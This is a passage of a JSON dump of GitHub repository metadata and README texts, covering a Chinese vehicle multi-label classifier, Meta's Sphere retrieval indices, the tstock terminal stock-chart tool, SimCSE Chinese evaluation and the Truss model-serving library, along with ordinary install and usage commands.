\n\u51fd\u6570__getitem__\u8d1f\u8d23\u8fed\u4ee3\u8fd4\u56de\u6570\u636e\u548c\u6807\u7b7e\uff0c\u8fd4\u56de\u7684\u6570\u636e\u9700\u8981\u7ecf\u8fc7\u6807\u51c6\u5316\u7b49\u9884\u5904\u7406\uff1b\u51fd\u6570__len__\u83b7\u53d6\u6570\u636e\u7684\u603b\u6570\u91cf\u3002\n\n##### <3>. \u8f66\u8f86\u591a\u6807\u7b7e\u8bad\u7ec3\u3001\u6d4b\u8bd5\u6a21\u5757 train_vehicle_multilabel.py\n\u6b64\u6a21\u5757\u8d1f\u8d23\u8f66\u8f86\u591a\u6807\u7b7e\u7684\u8bad\u7ec3\u548c\u6d4b\u8bd5\u3002\u8bad\u7ec3\u8fc7\u7a0b\u9009\u62e9\u4ea4\u53c9\u71b5\u4f5c\u4e3a\u635f\u5931\u51fd\u6570\uff0c\u9700\u8981\u6ce8\u610f\u7684\u662f\uff0c\u7531\u4e8e\u662f\u591a\u6807\u7b7e\u5206\u7c7b\uff0c\u6545\u8ba1\u7b97loss\u7684\u65f6\u5019\u9700\u8981\u7d2f\u52a0\u5404\u4e2a\u6807\u7b7e\u7684loss\uff0c\u5176\u4e2dloss = loss_color + loss_direction + 2.0 * loss_type\uff0c\u6839\u636e\u7ecf\u9a8c\uff0c\u5c06\u8f66\u8f86\u7c7b\u578b\u7684loss\u6743\u91cd\u653e\u5230\u52302\u500d\u6548\u679c\u8f83\u597d\u3002\n
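\nA minimal PyTorch sketch of this weighted multi-label loss is shown below. It is an illustration only: the label-group sizes are assumed placeholders, not the repository's actual numbers of colors, directions and types.\n
\n```python\nimport torch\nimport torch.nn as nn\n
\n# Assumed label-group sizes (placeholders); the network output is their concatenation.\nN_COLOR, N_DIRECTION, N_TYPE = 9, 5, 6\nce = nn.CrossEntropyLoss()\n
\ndef multilabel_loss(output, color_gt, direction_gt, type_gt):\n    # Slice the output vector into one segment per label group, compute a\n    # cross-entropy per segment, and weight the type loss by 2.0 as described above.\n    loss_color = ce(output[:, :N_COLOR], color_gt)\n    loss_direction = ce(output[:, N_COLOR:N_COLOR + N_DIRECTION], direction_gt)\n    loss_type = ce(output[:, N_COLOR + N_DIRECTION:], type_gt)\n    return loss_color + loss_direction + 2.0 * loss_type\n
\n# Tiny usage example with random tensors.\nout = torch.randn(4, N_COLOR + N_DIRECTION + N_TYPE)\nloss = multilabel_loss(out, torch.randint(0, N_COLOR, (4,)), torch.randint(0, N_DIRECTION, (4,)), torch.randint(0, N_TYPE, (4,)))\nprint(loss.item())\n```\n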
\n\u53e6\u4e00\u65b9\u9762\uff0c\u8bad\u7ec3\u5206\u4e3a\u4e24\u6b65\uff1a\uff081\uff09. \u51bb\u7ed3\u9664\u4e86Resnet-18\u9664\u5168\u8fde\u63a5\u5c42\u4e4b\u5916\u7684\u6240\u6709\u5c42\uff0cFine-tune\u8bad\u7ec3\u5230\u6536\u655b\u4e3a\u6b62\uff1b\uff082\uff09.\u6253\u5f00\u7b2c\u4e00\u6b65\u4e2d\u51bb\u7ed3\u7684\u6240\u6709\u5c42\uff0c\u8fdb\u4e00\u6b65Fine-tune\u8bad\u7ec3\uff0c\u8c03\u6574\u6240\u6709\u5c42\u7684\u6743\u91cd\uff0c\u76f4\u81f3\u6574\u4e2a\u6a21\u578b\u6536\u655b\u4e3a\u6b62\u3002\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "facebookresearch/Sphere", "link": "https://github.com/facebookresearch/Sphere", "tags": [], "stars": 511, "description": "Web-scale retrieval for knowledge-intensive NLP", "lang": "Python", "repo_lang": "", "readme": "# Sphere\n\n\n# About\nIn our paper [*The Web Is Your Oyster - Knowledge-Intensive NLP against a Very Large Web Corpus*](https://arxiv.org/abs/2112.09924) we propose to use a web corpus as a universal, uncurated and unstructured knowledge source for multiple KI-NLP tasks at once. \n\nWe leverage an open web corpus coupled with strong retrieval baselines instead of a black-box, commercial search engine - an approach which facilitates transparent and reproducible research and opens up a path for future studies comparing search engines optimised for humans with retrieval solutions designed for neural networks.\nWe use a subset of [CCNet](https://github.com/facebookresearch/cc_net) covering 134M documents split into 906M passages as the web corpus which we call **Sphere**.\n\nIn this repository we open source indices of Sphere both for the sparse retrieval baseline, compatible with [Pyserini](https://github.com/castorini/pyserini), and our best dense model compatible with [distributed-faiss](https://github.com/facebookresearch/distributed-faiss). 
We also provide instructions on how to evaluate the retrieval performance for both standard and newly introduced retrieval metrics, using the [KILT](https://github.com/facebookresearch/KILT) API.\n\n\n## Reference\nIf you use the content of this repository in your research, please cite the following:\n
```\n@article{DBLP:journals/corr/abs-2112-09924,\n author = {Aleksandra Piktus and Fabio Petroni\n and Vladimir Karpukhin and Dmytro Okhonko\n and Samuel Broscheit and Gautier Izacard\n and Patrick Lewis and Barlas Oguz\n and Edouard Grave and Wen{-}tau Yih\n and Sebastian Riedel},\n title = {The Web Is Your Oyster - Knowledge-Intensive {NLP} against a Very\n Large Web Corpus},\n journal = {CoRR},\n volume = {abs/2112.09924},\n year = {2021},\n url = {https://arxiv.org/abs/2112.09924},\n eprinttype = {arXiv},\n eprint = {2112.09924},\n timestamp = {Tue, 04 Jan 2022 15:59:27 +0100},\n biburl = {https://dblp.org/rec/journals/corr/abs-2112-09924.bib},\n bibsource = {dblp computer science bibliography, https://dblp.org}\n}\n```\n\n
## Installation\n```\ngit clone git@github.com:facebookresearch/Sphere.git\ncd Sphere\nconda create -n sphere -y python=3.7 && conda activate sphere\npip install -e .\n```\n\n
## Index download\nWe open source pre-built Sphere indices:\n- a Pyserini-compatible sparse BM25 index: [sphere_sparse_index.tar.gz](https://dl.fbaipublicfiles.com/sphere/sphere_sparse_index.tar.gz) - 775.6 GiB\n- a distributed-faiss-compatible dense DPR index: [sphere_dense_index.tar.gz](https://dl.fbaipublicfiles.com/sphere/sphere_dense_index.tar.gz) - 1.2 TiB\n\n
You can download and unpack the respective index files directly, e.g. via the browser or with `wget`:\n```\nmkdir -p faiss_index\n\nwget -P faiss_index https://dl.fbaipublicfiles.com/sphere/sphere_sparse_index.tar.gz\ntar -xzvf faiss_index/sphere_sparse_index.tar.gz -C faiss_index\n\nwget -P faiss_index https://dl.fbaipublicfiles.com/sphere/sphere_dense_index.tar.gz\ntar -xzvf faiss_index/sphere_dense_index.tar.gz -C faiss_index\n```\n\n
# Evaluation with [KILT](https://github.com/facebookresearch/KILT)\nWe implement the retrieval metrics introduced in the paper:\n- the `answer-in-context@k`,\n- the `answer+entity-in-context@k`,\n- as well as the `entity-in-input` ablation metric\n\nwithin the KILT repository. Follow the instructions below to perform and evaluate retrieval on KILT tasks for both sparse and dense Sphere indices.\n\n
## KILT dependencies\n```bash\npip install -e git+https://github.com/facebookresearch/KILT#egg=KILT\n```\n\nDownload KILT data. 
Check out instructions in the [KILT](https://github.com/facebookresearch/KILT#download-the-data) repo for more details.\n```bash\nmkdir -p data\npython src/kilt/scripts/download_all_kilt_data.py\npython src/kilt/scripts/get_triviaqa_input.py\n```\n\n## Dense index\n### Install dependencies\n```bash\npip install -e git+https://github.com/facebookresearch/distributed-faiss#egg=distributed-faiss\npip install -e git+https://github.com/facebookresearch/DPR@multi_task_training#egg=DPR\npip install spacy==2.1.8\npython -m spacy download en\n```\n\n### Launch `distributed-faiss` server\nMore details [here](https://github.com/facebookresearch/distributed-faiss#launching-servers-with-submitit-on-slurm-managed-clusters).\n```bash\npython src/distributed-faiss/scripts/server_launcher.py \\\n --log-dir logs \\\n --discovery-config faiss_index/disovery_config.txt \\\n --num-servers 32 \\\n --num-servers-per-node 4 \\\n --timeout-min 4320 \\\n --save-dir faiss_index/ \\\n --mem-gb 500 \\\n --base-port 13034 \\\n --partition dev &\n```\n### Download assets\n- The DPR_web model: [dpr_web_biencoder.cp](http://dl.fbaipublicfiles.com/sphere/dpr_web_biencoder.cp)\n- The configuration file: [dpr_web_sphere.yaml](https://dl.fbaipublicfiles.com/sphere/dpr_web_sphere.yaml)\n```bash\nmkdir -p checkpoints\nwget -P checkpoints http://dl.fbaipublicfiles.com/sphere/dpr_web_biencoder.cp\n\nmkdir -p configs\nwget -P configs https://dl.fbaipublicfiles.com/sphere/dpr_web_sphere.yaml\n```\n\nSubsequently update the following fields in the `dpr_web_sphere.yaml` configuration file:\n```bash\nn_docs: 100 # the number of documents to retrieve per query\nmodel_file: checkpoints/dpr_web_biencoder.cp # path to the downloaded model file\nrpc_retriever_cfg_file: faiss_index/disovery_config.txt # path to the discovery config file used when launching the distributed-faiss server\nrpc_index_id: dense # the name of the folder contaning dense index partitions\n```\n\n### Execute retrieval\nIn order to perform retrieval from the dense index you first need to launch the distributed-faiss server as described above. You can control the KILT datasets you perform retrieval for by modifying respective config files, e.g. 
`src/kilt/configs/dev_data.json`.\n```bash\npython src/kilt/scripts/execute_retrieval.py \\\n --model_name dpr_distr \\\n --model_configuration configs/dpr_web_sphere.yaml \\\n --test_config src/kilt/kilt/configs/dev_data.json \\\n --output_folder output/dense/\n```\n## Sparse index\n### Install dependencies\nOur sparse index relies on Pyserini, and therfore requires [an install of Java 11](https://github.com/castorini/pyserini#installation) to be available on the machine.\n```bash\npip install jnius\npip install pyserini==0.9.4.0\n```\n\n Next, download the following file:\n- The configuration file: [bm25_sphere.json](https://dl.fbaipublicfiles.com/sphere/bm25_sphere.json)\n```bash\nmkdir -p configs\nwget -P configs https://dl.fbaipublicfiles.com/sphere/bm25_sphere.json\n```\n\nSubsequently update the following field in the `bm25_sphere.json` configuration file:\n```bash\n\"k\": 100, # the number of documents to retrieve per query\n\"index\": \"faiss_index/sparse\", # path to the unpacked sparse BM25 index\n```\n\n### Execute retrieval\n```\npython src/kilt/scripts/execute_retrieval.py \\\n --model_name bm25 \\\n --model_configuration configs/bm25_sphere.json \\\n --test_config src/kilt/kilt/configs/dev_data.json \\\n --output_folder output/sparse/\n```\n\n## Retrieval evaluation\n```bash\npython src/kilt/kilt/eval_retrieval.py \\\n output/$index/$dataset-dev-kilt.jsonl \\ # retrieval results - the output of running eval_retrieval.py\n data/$dataset-dev-kilt.jsonl \\ # gold KILT file (available for download in the KILT repo)\n --ks=\"1,20,100\"\n```\n\n\n# Standalone dense index usage\nInstall and launch `distributed-faiss`. More details on the `distributed-faiss` server [here](https://github.com/facebookresearch/distributed-faiss#launching-servers-with-submitit-on-slurm-managed-clusters).\n\n```bash\npip install -e git+https://github.com/facebookresearch/distributed-faiss#egg=distributed-faiss\n```\n\n```bash\npython src/distributed-faiss/scripts/server_launcher.py \\\n --log-dir logs/ \\\n --discovery-config faiss_index/disovery_config.txt \\\n --num-servers 32 \\\n --num-servers-per-node 4 \\\n --timeout-min 4320 \\\n --save-dir faiss_index/ \\\n --mem-gb 500 \\\n --base-port 13034 \\\n --partition dev &\n```\n\n## Standalone client example\nFor a minimal working example of querying the Sphere dense index, we propose to interact with the DPR model via `transformers` API. To that end please install dependencies:\n```bash\npip install transformers==4.17.0\n```\nUsing the DPR checkpoing with transformers API requires reformatting the original checkpoint. 
You can download and unpack the `transformers`-complatible DPR_web query encoder here:\n- [dpr_web_query_encoder_hf.tar.gz](https://dl.fbaipublicfiles.com/sphere/dpr_web_query_encoder_hf.tar.gz)\n\n```bash\nmkdir -p checkpoints\nwget -P checkpoints https://dl.fbaipublicfiles.com/sphere/dpr_web_query_encoder_hf.tar.gz\ntar -xzvf checkpoints/dpr_web_query_encoder_hf.tar.gz -C checkpoints/\n```\nAlternatively, you can convert the [`dpr_web_biencoder.cp`](http://dl.fbaipublicfiles.com/sphere/dpr_web_biencoder.cp) model yourself using [available scripts](https://github.com/huggingface/transformers/blob/main/src/transformers/models/dpr/convert_dpr_original_checkpoint_to_pytorch.py).\n\n\nThen you can run the interactive demo:\n```bash\npython scripts/sphere_client_demo_hf.py \\\n --encoder checkpoints/dpr_web_query_encoder_hf \\\n --discovery-config faiss_index/disovery_config.txt \\\n --index-id dense\n```\n\n# License\n`Sphere` is released under the CC-BY-NC 4.0 license. See the `LICENSE` file for details.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "Gbox4/tstock", "link": "https://github.com/Gbox4/tstock", "tags": ["python", "trading", "stock-market", "crypto", "stocks", "stock-chart"], "stars": 511, "description": "\ud83d\udcc8A command line tool to view stock charts in the terminal.", "lang": "Python", "repo_lang": "", "readme": "# tstock - Generate stock charts in the terminal! \ud83d\ude80\ud83d\ude80\ud83d\ude80\n\n[![Downloads](https://pepy.tech/badge/tstock)](https://pepy.tech/project/tstock)\n![GitHub code size in bytes](https://img.shields.io/github/languages/code-size/Gbox4/tstock?label=size)\n![PyPI](https://img.shields.io/pypi/v/tstock)\n\n\ud83d\udcc8 tstock is a tool to easily generate stock charts from the command line.\n\nJust type `tstock aapl` to get a 3 month candlestick chart of $AAPL in your terminal!\n\n

\n*[demo animation: tstock-demo]*\n

\n\n# Features\n- Stocks for most global exchanges\n- Support for major cryptocurrencies\n- Forex markets and currency exchange rates\n- Different time intervals, including intraday trading\n- \"Wisdom\"?!\n\n# Dependencies\n\n- Python 3.6 or greater\n- Docker, if using the Docker version\n\n# Installation\n\n### PyPI\n\n`tstock` is available as a Python 3 package. You can install it using `pip`:\n\n```bash\npip install tstock # use pip3 on Ubuntu 18.04 and older\n```\n\n### AUR\n\n`tstock` is also available on the AUR. If you are on an Archlinux based system, you can just install it using your favorite AUR helper. Example using `yay`:\n\n```bash\nyay -S tstock\n```\n\n### Docker\n\n1. Build Docker: `docker build -t tstock .`\n2. Run: `docker run -e ALPHAVANTAGE_API_KEY= -it tstock:latest tstock aapl`\n\n# Getting started\n\n### AlphaVantage API setup\n\nAfter installing `tstock`, you will need a AlphaVantage API key to pull the market data.\n\n- Make a free AlphaVantage API account at https://www.alphavantage.co/support/#api-key\n- After creating the account, you will see your free API key\n- Run `export ALPHAVANTAGE_API_KEY=`. You can make this permanent by adding this line to your `.bashrc`\n\nNOTE: If you are on Windows, you can set your environment variable by running `$env:ALPHAVANTAGE_API_KEY=\"\"`. You can make this permanent by adding this line to `Microsoft.PowerShell_profile.ps1`\n\n### Usage\n\n```\n$ tstock --help\nusage: tstock [-h] [-t INTERVAL] [-b COUNT] [-w] [-s] [--chart] [-c CURRENCY] [-y LINES] [-a CLASS]\n [--padx COLUMNS] [--pady LINES] [--short] [--nocolor] [-v] [--version]\n [TICKER]\n\ntstock - generate stock charts in the terminal.\n\npositional arguments:\n TICKER Which ticker's data to pull.\n\noptions:\n -h, --help show this help message and exit\n -t INTERVAL Time interval of each candlestick. Valid values are '1min', '5min', '15min', '30min', '60min', 'day', 'week', or 'month'. Defaults to 'day'.\n -b COUNT Number of time intervals back to go back. The number of candlesticks generated. Defaults to fill the terminal.\n -w Enables extra words of 'wisdom'.\n -s Search for stock tickers. Useful for getting exchange codes.\n --chart Print the chart only. Overrides -w.\n -c CURRENCY Set the currency. Only works with '-a crypto'. Defaults to 'USD'.\n -y LINES Height of the chart. Defaults to fill the terminal.\n -a CLASS The asset class of TICKER. Valid values are 'stock', 'crypto', and 'forex'. Autodetects depending on input ticker.\n --padx COLUMNS Horizontal padding of the chart. Defaults to 5.\n --pady LINES Vertical padding of the chart. Defaults to 4.\n --short Short output, prints the last price only.\n --nocolor Prints chart with no color.\n --upcolor COLOR Color of positive candlesticks. Valid values are 'green', 'red', or 'blue'. Defaults to green.\n --downcolor COLOR Color of negative candlesticks. Valid values are 'green', 'red', or 'blue'. Defaults to red.\n -v Toggle verbosity.\n --version Print tstock version.\n\nExamples:\n tstock aapl # chart of $AAPL\n tstock aapl -b 24 -t 60min # the past 24 60-minute-intervals of $AAPL, 20 lines high\n tstock -s shopify # search the API for keyword \"shopify\"\n tstock shop.trt # chart of $SHOP on the TRT exchange\n tstock btc -c GBP -w # chart of the price of Bitcoin in GBP with rockets\n tstock usd/eur # chart of the price of USD in euros\n```\n\nRun `tstock TICKER` to get the a chart of `$TICKER`. Use `-b COUNT` to specify the number of intervals back you want to pull. 
`-t INTERVAL` will specify the time interval of each candlestick. Use `-y LINES` to specify the length of the chart's y axis.\n\nUse the search function `tstock -s KEYWORD` to search the AlphaVantage API for tickers.\n\nYou can get international markets by specifying a code after `.`. For example, to get SAIC Motor Corporation on the Shanghai Stock Exchange, run `tstock 600104.SHH`. The `-s` option is useful for finding the exchange codes for foreign exchanges. For example:\n\n```\ntstock tesco -s\nThe search returned the following results:\nTSCO.LON (Tesco PLC)\n Reigon: United Kingdom\n Type: Equity\n Currency: GBX\n```\n\nNow we know the ticker, we can get fetch the chart with `tstock tsco.lon`.\n\nFor more options, run `tstock -h`\n\nMore API information in AlphaVantage's docs: https://www.alphavantage.co/documentation\n\n\n# Notes\n\n- The free tier of the API is limited to 500 API calls per day, 5 calls per minute.\n- If you are using Windows, the ANSI escape codes will not display properly in the default cmd shell or PowerShell. Please use a terminal emulator that supports ANSI escape codes such as Windows Terminal.\n\n# Donate\n\nI develop `tstock` for free in my spare time. If you like it, and want to buy me a coffee, I'd really appreciate it.\n\nDonate: https://www.buymeacoffee.com/Gbox4\n\nBitcoin: (QR) `bc1qusuztegpfuh7jk25l2dx5xyjvasgryrqg42d5n`\n\nBCH: (QR) `qq0gedhne30lcr3253zz08sy4ryxukgx4gcrk6qzjg`\n\nMonero: (QR) `87wuCKbbchKV8Dz3JRoSN3jaqWBSiEShFXkFrYUaKT8Bew4P7dFvUJWVVR6RLr84J44QCdtNVyR6QC7aCSKYUWfnGK9y4K2`\n\nNano: `nano_15pqkfph8wfk4dbtkcrq88giff6xgqzs3znf44nfe1g8sgaixwaj6pbepsmn`\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "bojone/SimCSE", "link": "https://github.com/bojone/SimCSE", "tags": [], "stars": 511, "description": "SimCSE\u5728\u4e2d\u6587\u4efb\u52a1\u4e0a\u7684\u7b80\u5355\u5b9e\u9a8c", "lang": "Python", "repo_lang": "", "readme": "# SimCSE \u4e2d\u6587\u6d4b\u8bd5\n\nSimCSE\u5728\u5e38\u89c1\u4e2d\u6587\u6570\u636e\u96c6\u4e0a\u7684\u6d4b\u8bd5\uff0c\u5305\u542b[ATEC](https://github.com/IceFlameWorm/NLP_Datasets/tree/master/ATEC)\u3001[BQ](http://icrc.hitsz.edu.cn/info/1037/1162.htm)\u3001[LCQMC](http://icrc.hitsz.edu.cn/Article/show/171.html)\u3001[PAWSX](https://arxiv.org/abs/1908.11828)\u3001[STS-B](https://github.com/pluto-junzeng/CNSD)\u51715\u4e2a\u4efb\u52a1\u3002\n\n## \u4ecb\u7ecd\n\n- \u535a\u5ba2\uff1ahttps://kexue.fm/archives/8348\n- \u8bba\u6587\uff1a[\u300aSimCSE: Simple Contrastive Learning of Sentence Embeddings\u300b](https://arxiv.org/abs/2104.08821)\n- \u5b98\u65b9\uff1ahttps://github.com/princeton-nlp/SimCSE\n\n## \u6587\u4ef6\n\n```\n- utils.py \u5de5\u5177\u51fd\u6570\n- eval.py \u8bc4\u6d4b\u4e3b\u6587\u4ef6\n```\n\n## \u8bc4\u6d4b\n\n\u547d\u4ee4\u683c\u5f0f\uff1a\n```\npython eval.py [model_type] [pooling] [task_name] [dropout_rate]\n```\n\n\u4f7f\u7528\u4f8b\u5b50\uff1a\n```\npython eval.py BERT cls ATEC 0.3\n```\n\n\u5176\u4e2d\u56db\u4e2a\u53c2\u6570\u5fc5\u987b\u4f20\u5165\uff0c\u542b\u4e49\u5206\u522b\u5982\u4e0b\uff1a\n```\n- model_type: \u6a21\u578b\uff0c\u5fc5\u987b\u662f['BERT', 'RoBERTa', 'WoBERT', 'RoFormer', 'BERT-large', 'RoBERTa-large', 'SimBERT', 'SimBERT-tiny', 'SimBERT-small']\u4e4b\u4e00\uff1b\n- pooling: \u6c60\u5316\u65b9\u5f0f\uff0c\u5fc5\u987b\u662f['first-last-avg', 'last-avg', 'cls', 'pooler']\u4e4b\u4e00\uff1b\n- task_name: \u8bc4\u6d4b\u6570\u636e\u96c6\uff0c\u5fc5\u987b\u662f['ATEC', 'BQ', 'LCQMC', 'PAWSX', 
'STS-B']\u4e4b\u4e00\uff1b\n- dropout_rate: \u6d6e\u70b9\u6570\uff0cdropout\u7684\u6bd4\u4f8b\uff0c\u5982\u679c\u4e3a0\u5219\u4e0ddropout\uff1b\n```\n\n## \u73af\u5883\n\u6d4b\u8bd5\u73af\u5883\uff1atensorflow 1.14 + keras 2.3.1 + bert4keras 0.10.5\uff0c\u5982\u679c\u5728\u5176\u4ed6\u73af\u5883\u7ec4\u5408\u4e0b\u62a5\u9519\uff0c\u8bf7\u6839\u636e\u9519\u8bef\u4fe1\u606f\u81ea\u884c\u8c03\u6574\u4ee3\u7801\u3002\n\n## \u4e0b\u8f7d\n\nGoogle\u5b98\u65b9\u7684\u4e24\u4e2aBERT\u6a21\u578b\uff1a\n- BERT\uff1a[chinese_L-12_H-768_A-12.zip](https://storage.googleapis.com/bert_models/2018_11_03/chinese_L-12_H-768_A-12.zip)\n- RoBERTa\uff1a[chinese_roberta_wwm_ext_L-12_H-768_A-12.zip](https://github.com/ymcui/Chinese-BERT-wwm)\n- NEZHA\uff1a[NEZHA-base-WWM](https://github.com/huawei-noah/Pretrained-Language-Model/tree/master/NEZHA-TensorFlow)\n- WoBERT\uff1a[chinese_wobert_plus_L-12_H-768_A-12.zip](https://github.com/ZhuiyiTechnology/WoBERT)\n- RoFormer\uff1a[chinese_roformer_L-12_H-768_A-12.zip](https://github.com/ZhuiyiTechnology/roformer)\n- SimBERT: [chinese_simbert_L-12_H-768_A-12.zip](https://github.com/ZhuiyiTechnology/simbert)\n- SimBERT-small: [chinese_simbert_L-6_H-384_A-12.zip](https://github.com/ZhuiyiTechnology/simbert)\n- SimBERT-tiny: [chinese_simbert_L-4_H-312_A-12.zip](https://github.com/ZhuiyiTechnology/simbert)\n\n\u5173\u4e8e\u8bed\u4e49\u76f8\u4f3c\u5ea6\u6570\u636e\u96c6\uff0c\u53ef\u4ee5\u4ece\u6570\u636e\u96c6\u5bf9\u5e94\u7684\u94fe\u63a5\u81ea\u884c\u4e0b\u8f7d\uff0c\u4e5f\u53ef\u4ee5\u4ece\u4f5c\u8005\u63d0\u4f9b\u7684\u767e\u5ea6\u4e91\u94fe\u63a5\u4e0b\u8f7d\u3002\n- \u94fe\u63a5: https://pan.baidu.com/s/1d6jSiU1wHQAEMWJi7JJWCQ \u63d0\u53d6\u7801: qkt6\n\n\u5176\u4e2dsenteval_cn\u76ee\u5f55\u662f\u8bc4\u6d4b\u6570\u636e\u96c6\u6c47\u603b\uff0csenteval_cn.zip\u662fsenteval\u76ee\u5f55\u7684\u6253\u5305\uff0c\u4e24\u8005\u4e0b\u5176\u4e00\u5c31\u597d\u3002\n\n## \u76f8\u5173\n- BERT-whitening\uff1ahttps://github.com/bojone/BERT-whitening\n\n## \u4ea4\u6d41\n\nQQ\u4ea4\u6d41\u7fa4\uff1a808623966\uff0c\u5fae\u4fe1\u7fa4\u8bf7\u52a0\u673a\u5668\u4eba\u5fae\u4fe1\u53f7spaces_ac_cn\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "basetenlabs/truss", "link": "https://github.com/basetenlabs/truss", "tags": ["data-science", "machine-learning", "python"], "stars": 511, "description": "Serve any model without boilerplate code", "lang": "Python", "repo_lang": "", "readme": "# Truss\n\n**Serve any model without boilerplate code**\n\n![Truss logo](https://raw.githubusercontent.com/basetenlabs/truss/main/docs/assets/truss_logo_horizontal.png)\n\n[![PyPI version](https://badge.fury.io/py/truss.svg)](https://badge.fury.io/py/truss)\n[![ci_status](https://github.com/basetenlabs/truss/actions/workflows/main.yml/badge.svg)](https://github.com/basetenlabs/truss/actions/workflows/main.yml)\n\nMeet Truss, a seamless bridge from model development to model delivery. Truss presents an open-source standard for packaging models built in any framework for sharing and deployment in any environment, local or production.\n\nGet started with the [end-to-end tutorial](https://truss.baseten.co/e2e).\n\n## What can I do with Truss?\n\nIf you've ever tried to get a model out of a Jupyter notebook, Truss is for you.\n\nTruss exposes just the right amount of complexity around things like Docker and APIs without you really having to think about them. 
Here are some of the things Truss does:\n\n* \ud83c\udfce Turns your Python model into a microservice with a production-ready API endpoint, no need for Flask or Django.\n* \ud83c\udf9a For most popular frameworks, includes automatic model serialization and deserialization.\n* \ud83d\udecd Freezes dependencies via Docker to make your training environment portable.\n* \ud83d\udd70 Enables rapid iteration with local development that matches your production environment.\n* \ud83d\uddc3 Encourages shipping parsing and even business logic alongside your model with integrated pre- and post-processing functions.\n* \ud83e\udd16 Supports running predictions on GPUs. (Currently limited to certain hardware, more coming soon)\n* \ud83d\ude49 Bundles secret management to securely give your model access to API keys.\n\n## Installation\n\nTruss requires Python >=3.7, <3.11\n\nTo install from [PyPi](https://pypi.org/project/truss/), run:\n\n```\npip install truss\n```\n\nTo download the source code directly (for development), clone this repository and follow the setup commands in our [contributors' guide](CONTRIBUTING.md).\n\nTruss is actively developed, and we recommend using the latest version. To update your Truss installation, run:\n\n```\npip install --upgrade truss\n```\n\nThough Truss is in beta, we do care about backward compatibility. Review the [release notes](docs/CHANGELOG.md) before upgrading, and note that we follow semantic versioning, so any breaking changes require the release of a new major version.\n\n## How to use Truss\n\nGenerate and serve predictions from a Truss with [this Jupyter notebook](docs/notebooks/sklearn_example.ipynb).\n\n### Quickstart: making a Truss\n\n```python\n!pip install --upgrade scikit-learn truss\n\nimport truss\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.datasets import load_iris\n\n# Load the iris data set\niris = load_iris()\ndata_x = iris['data']\ndata_y = iris['target']\n\n# Train the model\nrfc = RandomForestClassifier()\nrfc.fit(data_x, data_y)\n\n# Create the Truss (serializing & packaging model)\ntr = truss.create(rfc, target_directory=\"iris_rfc_truss\")\n\n# Serve a prediction from the model\ntr.predict({\"inputs\": [[0, 0, 0, 0]]})\n```\n\n### Package your model\n\nThe `truss.create()` command can be used with any supported framework:\n\n* [Hugging Face](https://truss.baseten.co/create/huggingface)\n* [LightGBM](https://truss.baseten.co/create/lightgbm)\n* [PyTorch](https://truss.baseten.co/create/pytorch)\n* [scikit-learn](https://truss.baseten.co/create/sklearn)\n* [Tensorflow](https://truss.baseten.co/create/tensorflow)\n* [XGBoost](https://truss.baseten.co/create/xgboost)\n\nBut in more complex cases, you can build a Truss manually for any model. Start with `truss init my_truss` and follow [this guide](https://truss.baseten.co/create/manual).\n\n### Serve your model locally\n\nServing your model with Truss, on Docker, lets you interface with your model via HTTP requests. Start your model server with:\n\n```\ntruss run-image iris_rfc_truss\n```\n\nThen, as long as the container is running, you can invoke the model as an API as follows:\n\n```\ncurl -X POST http://127.0.0.1:8080/v1/models/model:predict -d '{\"inputs\": [[0, 0, 0, 0]]}'\n```\n\n### Configure your model for deployment\n\nTruss is configurable to its core. Every Truss must include a file `config.yaml` in its root directory, which is automatically generated when the Truss is created. However, configuration is optional. 
Every configurable value has a sensible default, and a completely empty config file is valid.\n\nThe Truss we generated above in the quickstart sample has a good example of a typical Truss config:\n\n```yaml\nmodel_framework: sklearn\nmodel_metadata:\n model_binary_dir: model\n supports_predict_proba: true\npython_version: py39\nrequirements:\n- scikit-learn==1.0.2\n- threadpoolctl==3.0.0\n- joblib==1.1.0\n- numpy==1.20.3\n- scipy==1.7.3\n```\n\nFollow the [configuration guide](https://truss.baseten.co/develop/configuration) and use the complete reference of configurable properties to make your Truss perform exactly as you wish.\n\n### Deploy your model\n\nYou can deploy a Truss anywhere that can run a Docker image, as well as purpose-built platforms like [Baseten](https://baseten.co).\n\nFollow step-by-step deployment guides for the following platforms:\n\n* [AWS ECS](https://truss.baseten.co/deploy/aws)\n* [Baseten](https://truss.baseten.co/deploy/baseten)\n* [GCP Cloud Run](https://truss.baseten.co/deploy/gcp)\n\n## Contributing\n\nWe hope this vision excites you, and we gratefully welcome contributions in accordance with our [contributors' guide](CONTRIBUTING.md) and [code of conduct](CODE_OF_CONDUCT.md).\n\nTruss was first developed at [Baseten](https://baseten.co) by maintainers Phil Howes, Pankaj Gupta, and Alex Gillmor.\n\n## GitHub Codespace\n\nIf your organization allows to access to GitHub Codespaces, you can launch a Codespace for truss development. If you are a GPU Codespace, make sure to use the `.devcontainer/gpu/devcontainer.json` configuration to have access to a GPU and be able to use it in Docker with truss.\n", "readme_type": "markdown", "hn_comments": "Looks interesting, what if I need to write some logic (pre/post prediction) in the prediction server?This is likely to share its name with the next Prime Minister of the UK...In this category I\u2019m a big fan of https://github.com/bentoml/BentoMLWhat I like about it is their idiomatic developer experience. It reminds me of other Pythonic frameworks like Flask and Django in a good way.I have no affiliation with them whatsoever, just an admirer.Looks great! What is the argument to use this over MLFlow model packaging and serving?Superb product and team.Worth looking into if you\u2019ve done any engineering work around deploying ML models as a or within a service.This looks promising. It feels like for non ML engineers it\u2019s very hard to figure out how to use models as part of vanilla CRUD codebase.For instance in a Rails app the ML model services would probably be served as a completely external service API generated with something like Truss wrapped in a service class that just exposes the outputs and handles errors/input validation!", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "vsbuffalo/bds-files", "link": "https://github.com/vsbuffalo/bds-files", "tags": [], "stars": 511, "description": "Supplementary files for my book, \"Bioinformatics Data Skills\"", "lang": "Python", "repo_lang": "", "readme": "# The Supplementary Material Repository for Bioinformatics Data Skills\n\nThis repository contains the supplementary files used in my book,\n[Bioinformatics Data Skills](http://shop.oreilly.com/product/0636920030157.do),\npublished by O'Reilly Media. 
